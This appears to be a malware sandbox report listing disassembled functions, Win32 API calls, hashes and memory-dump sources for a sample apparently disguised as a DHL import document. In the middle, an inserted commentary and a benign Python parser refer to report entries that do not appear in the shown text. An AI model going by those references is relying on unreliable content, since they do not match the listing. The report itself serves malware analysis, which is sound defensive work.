                                                                                          • Instruction ID: ca2b1168db82a0174d3510e389dcf30b963c4c11a73c8fa0288a957dbf85e861
                                                                                          • Opcode Fuzzy Hash: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
                                                                                          • Instruction Fuzzy Hash: F461BE30102650DFDF619F16D948B26BBF1FB4A312F24555DE0869AA70CB79ACD0CFA2
                                                                                          APIs
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          • GetSysColor.USER32(0000000F), ref: 007E9862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ColorLongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 259745315-0
                                                                                          • Opcode ID: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
                                                                                          • Instruction ID: da79323291d0be51a6d9988239b6d14c985bd7c412f466db0a9c3e5edd1e6146
                                                                                          • Opcode Fuzzy Hash: 0f883cf01d25103500c3fdbb187ae1f9fe6983222ca476ecc630375453c3185e
                                                                                          • Instruction Fuzzy Hash: 9E41B032105690AFDB205F3A9C88BB93BA5FB1A330F155615FAA2872F2D7749C81DB11
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00839717
                                                                                          • LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839720
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0081F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00839742
                                                                                          • LoadStringW.USER32(00000000,?,0081F7F8,00000001), ref: 00839745
                                                                                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00839866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                          • API String ID: 747408836-2268648507
                                                                                          • Opcode ID: 5c16de24b4680f0567f6abba1d4fc2b1794bfc160d5fcd7b0dbe95c2775a70be
                                                                                          • Instruction ID: 1a4cbf73a3bdd75224209cfdc44eb698016c8f903b5bac14958710e7c5e77426
                                                                                          • Opcode Fuzzy Hash: 5c16de24b4680f0567f6abba1d4fc2b1794bfc160d5fcd7b0dbe95c2775a70be
                                                                                          • Instruction Fuzzy Hash: D2414172900119AADF04FBE4DE4ADEEB778FF55740F100026F605B2191EA796F58CBA1
                                                                                          APIs
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008307A2
                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008307BE
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008307DA
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00830804
                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0083082C
                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00830837
                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083083C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 323675364-22481851
                                                                                          • Opcode ID: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
                                                                                          • Instruction ID: c95c492da6b15afcd84ac6fc3dad4858a91e89ff8d086e75beb49a44e28b4ba9
                                                                                          • Opcode Fuzzy Hash: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
                                                                                          • Instruction Fuzzy Hash: AF411872C10229EBDF11EBA4DC999EDB778FF44750F05416AE901A32A1EB749E04CF90
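The "APIs" bullets in each function entry follow a fixed shape (API.MODULE(args), ref: address, optionally prefixed with "Part of subcall function"), so they can be parsed mechanically and run through simple rules instead of being read by eye. Two entries above are worth that treatment: the mciSendStringW sequence with the "PlayMe" alias and the WNetAddConnection2W / RegConnectRegistryW / SOFTWARE\Classes\ / CLSIDFromString chain, which together read as the AutoIt interpreter stub the report flags ("Binary is likely a compiled AutoIt script file") rather than as payload-specific code. The following is an added example, not Joe Sandbox output or tooling: the sample lines are copied from the two entries above, while the rule names, the KNOWN_CONSTANTS table (HKEY_LOCAL_MACHINE = 0x80000002, KEY_READ = 0x20019) and the set-based matching are my own constructions, and the example does not reproduce Joe Sandbox's API ID or API String ID hashing.

```python
"""Parse Joe Sandbox 'APIs' listing lines and run simple rules over them.
Added example; not part of Joe Sandbox or the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input: API lines copied from two function entries in the report above
# (the remote-registry CLSID lookup and the MCI sound-playing function),
# plus one no-argument call to exercise that branch of the parser.
SAMPLE = """\
• Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008307A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008307BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\\Classes\\), ref: 008307DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\\Classes\\), ref: 00830804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\\Classes\\), ref: 0083082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\\Classes\\), ref: 00830837
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0083EA5D
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083EA96
• CoUninitialize.OLE32 ref: 00853C94
"""

# One listing line: optional subcall prefix, API.MODULE, optional (args), ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: list = field(default_factory=list)
    subcall: Optional[str] = None  # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per bullet that matches LINE_RE; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # section headers such as "Strings" or "APIs"
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), m.group("ref"), args, m.group("sub")))
    return calls


# Constants that the listing shows literally, keyed by (API, 0-based argument index).
# Values are the documented Win32 definitions; the table itself is this example's own.
KNOWN_CONSTANTS = {
    ("RegConnectRegistryW", 1): {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"},
    ("RegOpenKeyExW", 3): {"00020019": "KEY_READ"},
}


def decode_constant(api: str, index: int, value: str) -> Optional[str]:
    return KNOWN_CONSTANTS.get((api, index), {}).get(value)


# Hypothetical rules: a rule matches when every listed API appears in the entry.
RULES = {
    "remote_registry_clsid_lookup": {"WNetAddConnection2W", "RegConnectRegistryW", "CLSIDFromString"},
    "mci_sound_playback": {"mciSendStringW"},
}


def matched_rules(calls: list, rules=RULES) -> list:
    seen = {c.api for c in calls}
    return sorted(name for name, needed in rules.items() if needed <= seen)


def literal_args(calls: list) -> list:
    """(api, argument) pairs that are neither '?' nor 8-digit hex immediates,
    i.e. the strings the sandbox recovered from the argument slots."""
    hexre = re.compile(r"^-?[0-9A-Fa-f]{8}$")
    return [(c.api, a) for c in calls for a in c.args if a != "?" and not hexre.match(a)]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref} {c.api}.{c.module}({', '.join(c.args)})")
    print("rules:", matched_rules(parsed))
    print("literals:", literal_args(parsed))
    print("RegConnectRegistryW hKey =", decode_constant("RegConnectRegistryW", 1, parsed[2].args[1]))
```

The trailing "SOFTWARE\Classes\" argument on RegQueryValueExW and RegCloseKey is stack context the sandbox attached to the call, not a parameter of those APIs, which is why literal_args reports strings per call rather than trying to map them to parameter positions; only the two positional constants in KNOWN_CONSTANTS are decoded by slot.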
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 00853C5C
                                                                                          • CoInitialize.OLE32(00000000), ref: 00853C8A
                                                                                          • CoUninitialize.OLE32 ref: 00853C94
                                                                                          • _wcslen.LIBCMT ref: 00853D2D
                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00853DB1
                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00853ED5
                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00853F0E
                                                                                          • CoGetObject.OLE32(?,00000000,0086FB98,?), ref: 00853F2D
                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00853F40
                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00853FC4
                                                                                          • VariantClear.OLEAUT32(?), ref: 00853FD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 429561992-0
                                                                                          • Opcode ID: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
                                                                                          • Instruction ID: 517aac770418fc73d58b37f4d78b8aca41ef7bb9d4496640420507fa828665d5
                                                                                          • Opcode Fuzzy Hash: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
                                                                                          • Instruction Fuzzy Hash: 0BC10271608205AFD700DF68C88492AB7F9FF89789F10495DF98ADB211DB71EE09CB52
APIs
• CoInitialize.OLE32(00000000), ref: 00847AF3
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00847B8F
• SHGetDesktopFolder.SHELL32(?), ref: 00847BA3
• CoCreateInstance.OLE32(0086FD08,00000000,00000001,00896E6C,?), ref: 00847BEF
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00847C74
• CoTaskMemFree.OLE32(?,?), ref: 00847CCC
• SHBrowseForFolderW.SHELL32(?), ref: 00847D57
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00847D7A
• CoTaskMemFree.OLE32(00000000), ref: 00847D81
• CoTaskMemFree.OLE32(00000000), ref: 00847DD6
• CoUninitialize.OLE32 ref: 00847DDC
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: dd037ea8fd695940ccead705ff87994600321a0a2695413527ba1493323d23f3
• Instruction ID: 21a2b8877e65ca00af6b8e478677939273c7a61781360d2c5bd69e6a27840503
• Opcode Fuzzy Hash: dd037ea8fd695940ccead705ff87994600321a0a2695413527ba1493323d23f3
• Instruction Fuzzy Hash: F2C11A75A04109EFCB14DFA4C888DAEBBB9FF48314B1584A9E91ADB361D730ED45CB90
APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00865504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00865515
• CharNextW.USER32(00000158), ref: 00865544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00865585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0086559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008655AC
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
• Instruction ID: bd7f8c4c0bfd6d811c49b81ba92471a2f9d6fd418878393d60eae1814df6ffb2
• Opcode Fuzzy Hash: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
• Instruction Fuzzy Hash: E3618E70900609EFDF109F64CC899FE7BB9FB09724F124189F965EB290DB748A81DB61
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0082FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0082FB08
• VariantInit.OLEAUT32(?), ref: 0082FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0082FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0082FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0082FBA1
• VariantClear.OLEAUT32(?), ref: 0082FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0082FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBCC
• VariantClear.OLEAUT32(?), ref: 0082FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBE9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
• Instruction ID: 35b48653fbfd16d19f71ed74b97969caac005f078034ab9e5646c602c364acda
• Opcode Fuzzy Hash: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
• Instruction Fuzzy Hash: AA413035A00229DFCB00DF68D8589ADBBB9FF48354F418075E946E7262CB74A945CFA0
APIs
• GetKeyboardState.USER32(?), ref: 00839CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00839D22
• GetKeyState.USER32(000000A0), ref: 00839D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00839D57
• GetKeyState.USER32(000000A1), ref: 00839D6C
• GetAsyncKeyState.USER32(00000011), ref: 00839D84
• GetKeyState.USER32(00000011), ref: 00839D96
• GetAsyncKeyState.USER32(00000012), ref: 00839DAE
• GetKeyState.USER32(00000012), ref: 00839DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00839DD8
• GetKeyState.USER32(0000005B), ref: 00839DEA
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
• Instruction ID: d196d1a90cdf961a7e8aff70a705aacb50b37c7dbff452fa69bb8a123b7b4932
• Opcode Fuzzy Hash: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
• Instruction Fuzzy Hash: 2A41C6345047CA6DFF319664C8053B6BEA0FF91344F04905ADAC7966C2EBE599C8CBE2
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 008505BC
• inet_addr.WSOCK32(?), ref: 0085061C
• gethostbyname.WSOCK32(?), ref: 00850628
• IcmpCreateFile.IPHLPAPI ref: 00850636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008506C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008506E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 008507B9
• WSACleanup.WSOCK32 ref: 008507BF
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: a25a77e25132ef1083fe6654275de892d3ec25963e854261cfac6006284fc691
• Instruction ID: 0a153e0960a5cf715975a88fdbfc7ff18921141dbb3ef0dddbb89cd812cbc500
• Opcode Fuzzy Hash: a25a77e25132ef1083fe6654275de892d3ec25963e854261cfac6006284fc691
• Instruction Fuzzy Hash: 7E91AC356042019FD320CF15C888B1ABBE0FF48318F0585A9E8AADB7A2D771ED49CF81
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
• Instruction ID: be8dd7d3d7437a016448632e7facb493c8f2fea5fb4cb281cbced1c1ccf50328
• Opcode Fuzzy Hash: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
• Instruction Fuzzy Hash: 96518F31A00116DBCF14DF68C9418BEB7B5FF64725B24422AE966F7284EB35DD488B90
APIs
• CoInitialize.OLE32 ref: 00853774
• CoUninitialize.OLE32 ref: 0085377F
• CoCreateInstance.OLE32(?,00000000,00000017,0086FB78,?), ref: 008537D9
• IIDFromString.OLE32(?,?), ref: 0085384C
• VariantInit.OLEAUT32(?), ref: 008538E4
• VariantClear.OLEAUT32(?), ref: 00853936
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: cb212d5678354f76984865c89b32e105ee0c9f58876b82456bae36e5bb9ad575
• Instruction ID: ce8a12f9bb85f01563f86486691603e80e239cdc5b8e0c63dce344f28acd0dd4
• Opcode Fuzzy Hash: cb212d5678354f76984865c89b32e105ee0c9f58876b82456bae36e5bb9ad575
• Instruction Fuzzy Hash: 2C61B0B0608301AFD715DF64C849B6ABBE4FF49755F100829F985DB291D770EE48CBA2
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008433CF
  • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008433F0
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
• Opcode ID: 9e1bb6ef6a0de54dca2490c06e421d30f3db874165e7b411bec20e6ef3480cfc
• Instruction ID: e830ef5e84145a0ef067986918787661264f7c0e984a66954d99ae8d286ff4d8
• Opcode Fuzzy Hash: 9e1bb6ef6a0de54dca2490c06e421d30f3db874165e7b411bec20e6ef3480cfc
• Instruction Fuzzy Hash: 08518D71900209EADF15EBA0CD4AEEEB778FF14340F144066F505B2292EB692F58DB61
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 1256254125-769500911
• Opcode ID: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
• Instruction ID: 22382b54d88d43e96c9f9218db468c4621e4b9314321ec98d386e547520b180d
• Opcode Fuzzy Hash: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
• Instruction Fuzzy Hash: CB41C5B2A010269BCB10AEBDC8925BE77A5FBF0754F244229E625DB285F735CD81C7D0
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 008453A0
                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00845416
                                                                                          • GetLastError.KERNEL32 ref: 00845420
                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 008454A7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
                                                                                          • Instruction ID: e794de0972d3a70c1213ce0c55684f93d9b9a78e5f5976f7a8ccb79c6fa89ffe
                                                                                          • Opcode Fuzzy Hash: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
                                                                                          • Instruction Fuzzy Hash: 8B318FB5A006089FCB10DF68C488AAEBBB4FB45349F188065E505DF392EB75DD86CB91
                                                                                          APIs
                                                                                          • CreateMenu.USER32 ref: 00863C79
                                                                                          • SetMenu.USER32(?,00000000), ref: 00863C88
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00863D10
                                                                                          • IsMenu.USER32(?), ref: 00863D24
                                                                                          • CreatePopupMenu.USER32 ref: 00863D2E
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00863D5B
                                                                                          • DrawMenuBar.USER32 ref: 00863D63
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                          • String ID: 0$F
                                                                                          • API String ID: 161812096-3044882817
                                                                                          • Opcode ID: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
                                                                                          • Instruction ID: c74289dd685febd9472434ac8a680af2c0854c2267083ba4db7badbdf6527061
                                                                                          • Opcode Fuzzy Hash: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
                                                                                          • Instruction Fuzzy Hash: CA413779A01209EFDF14DF64DC88AAABBB5FF49350F150029FA46A7360D771AA10CB94
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00831F64
                                                                                          • GetDlgCtrlID.USER32 ref: 00831F6F
                                                                                          • GetParent.USER32 ref: 00831F8B
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00831F8E
                                                                                          • GetDlgCtrlID.USER32(?), ref: 00831F97
                                                                                          • GetParent.USER32(?), ref: 00831FAB
                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00831FAE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 711023334-1403004172
                                                                                          • Opcode ID: c040c2a2519ef9fc3e214dcc74c90029cb554d74a542b54f33b993bed6cf41ca
                                                                                          • Instruction ID: d0f948c4f6800638e30954ed0a4fbdd710c315745dfc37788d5d7177a91f0e7a
                                                                                          • Opcode Fuzzy Hash: c040c2a2519ef9fc3e214dcc74c90029cb554d74a542b54f33b993bed6cf41ca
                                                                                          • Instruction Fuzzy Hash: 9C21D474A00214BBCF05AFA0DC89DFEBBB8FF55310F00511AF965A7291DB785905DBA4
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00863A9D
                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00863AA0
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00863AC7
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00863AEA
